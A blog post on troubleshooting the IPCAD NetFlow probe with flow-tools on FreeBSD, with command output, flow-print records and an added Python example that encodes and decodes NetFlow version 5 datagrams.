Notice how IPCAD reports 21 cached NetFlows. This caused a problem, since apparently IPCAD had not flushed any flows to disk yet. I got the following error when trying to read the flows using Flow-cat and Flow-print:

orr:/root# flow-cat /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/ | flow-print
flow-print: ftiheader_read(): Warning, short read while loading header top.
flow-print: ftiheader_read(): failed
flow-print: ftio_init(): failed

Looking at the directory holding the flows, we see only a .tmp file:

orr:/root# ls /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/
tmp-v05.2005-04-13.235643-0400

One minute later I check IPCAD's status again:

orr:/root# rsh localhost status
connect to address ::1: Connection refused
Trying 127.0.0.1...
Interface wi0: received 638, 5 m average 638 bytes/sec, 0 pkts/sec, dropped 0
Flow entries made: 195
NetFlow cached flows: 0
Memory usage: 1% (17160 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 4 minutes
orr.taosecurity.com uptime is 1:01

Now we see zero cached flows, so I use Flow-cat and Flow-print again.

orr:/root# flow-cat /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/ | flow-print
srcIP            dstIP            prot  srcPort  dstPort  octets  packets
131.106.56.63    224.0.0.251        17     5353     5353     686        2
131.106.58.184   224.0.0.251        17     5353     5353     189        1
0.0.0.0          224.0.0.1           2    65535    65535      28        1
...edited...
131.106.57.94    131.106.63.255     17      137      137     702        9
131.106.57.94    131.106.63.255     17      138      138     817        4
66.102.15.100    131.106.57.173      6       80    53759  125977      133
131.106.57.173   66.102.15.100       6    53759       80   47834      102
```
...truncated...

We can view these records because the .tmp file is replaced by a real flow record:

orr:/root# ls /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/
ft-v05.2005-04-13.235643-0400
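To show what actually travels from IPCAD to flow-capture on UDP 9995, here is an added Python example (not IPCAD's or flow-tools' code) that encodes and decodes a NetFlow version 5 datagram, the version the ft-v05 file name refers to. The layout is the standard v5 header and 48-byte record; the two flows are constructed from the flow-print rows above, and the parser refuses a truncated datagram rather than reading past the records the header promises.

```python
import socket
import struct

# NetFlow v5 wire layout (network byte order): a 24-byte header followed by
# fixed 48-byte records. Field order follows the standard v5 definition.
HEADER = struct.Struct("!HHIIIIBBH")   # version, count, uptime ms, secs, nsecs, seq, engine type/id, sampling
RECORD = struct.Struct("!4s4s4sHHIIIIHHBBBBHHBBH")

def build_v5(flows, uptime_ms=120000, unix_secs=1113448566, seq=0):
    """Encode (src, dst, proto, sport, dport, octets, packets) tuples as one v5 datagram."""
    hdr = HEADER.pack(5, len(flows), uptime_ms, unix_secs, 0, seq, 0, 0, 0)
    body = b"".join(
        RECORD.pack(socket.inet_aton(src), socket.inet_aton(dst), b"\0\0\0\0",  # src, dst, nexthop
                    0, 0,                          # input/output SNMP ifindex (unused here)
                    packets, octets,               # dPkts, dOctets
                    uptime_ms - 1000, uptime_ms,   # first/last seen, in sysuptime ms
                    sport, dport, 0, 0, proto, 0,  # ports, pad, tcp flags, protocol, tos
                    0, 0, 0, 0, 0)                 # AS numbers, masks, pad
        for src, dst, proto, sport, dport, octets, packets in flows)
    return hdr + body

def parse_v5(datagram):
    """Decode a v5 datagram into flow-print style rows; rejects bad versions and short reads."""
    if len(datagram) < HEADER.size:
        raise ValueError("short read while loading header")
    version, count, *_ = HEADER.unpack_from(datagram, 0)
    if version != 5:
        raise ValueError("unexpected NetFlow version %d" % version)
    if len(datagram) < HEADER.size + count * RECORD.size:
        raise ValueError("datagram truncated: header promises %d records" % count)
    rows = []
    for i in range(count):
        r = RECORD.unpack_from(datagram, HEADER.size + i * RECORD.size)
        rows.append({"srcIP": socket.inet_ntoa(r[0]), "dstIP": socket.inet_ntoa(r[1]),
                     "prot": r[13], "srcPort": r[9], "dstPort": r[10],
                     "octets": r[6], "packets": r[5]})
    return rows
```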

Hopefully you have a better idea how NetFlow works. If you're a student, you have additional material that I discussed in class but that didn't appear on the slides!

Also -- here is a link to my blog entry on the method I'm using now to bond interfaces into ngeth0 on FreeBSD 5.3. Here is a link to my post on Flowgrep.

For news on the new Sguil FreeBSD port submissions, check on Problem Report ports/77473 for the Sguil-sensor and Problem Report ports/77690 for the Sguil-server.